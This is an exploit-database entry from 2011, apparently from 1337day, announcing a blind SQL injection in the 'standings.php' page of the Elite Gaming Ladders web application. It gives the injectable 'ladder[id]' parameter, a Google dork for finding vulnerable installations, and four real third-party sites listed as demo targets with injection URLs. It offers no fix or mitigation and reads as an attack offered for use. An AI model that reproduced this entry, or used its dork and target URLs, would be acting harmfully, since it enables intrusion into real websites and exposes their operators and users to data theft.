Elite Gaming Ladders (standings.php) Blind sql-i Vulnerability

2011-07-05T00:00:00
ID 1337DAY-ID-16464
Type zdt
Reporter Angel Injection
Modified 2011-07-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:Elite Gaming Ladders(standings.php)sql-i Vulnerability
# Date: 5/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link:N/A
# Version: n/a
# Category:: webapps
# Google dork: intitle:"Powered By EGL" inurl:standings.php?ladder[id]=
# Tested on: Linux Back Track 5
# Demo site:
# 1-http://ourgamesourbond.com/ladder/standings.php?ladder[id]=8%27
# 2-http://www.cod-srbija.com/l/standings.php?ladder[id]=2%27
# 3-http://clanzarena.com/standings.php?ladder[id]=1%27
# 4-http://www.tricks-gaming.nl/ladder/standings.php?ladder[id]=1%27

Exploit
http://server/[path]/standings.php?ladder[id]= Injection Here

-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Greetz To :1337day Team
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2018-04-11]  #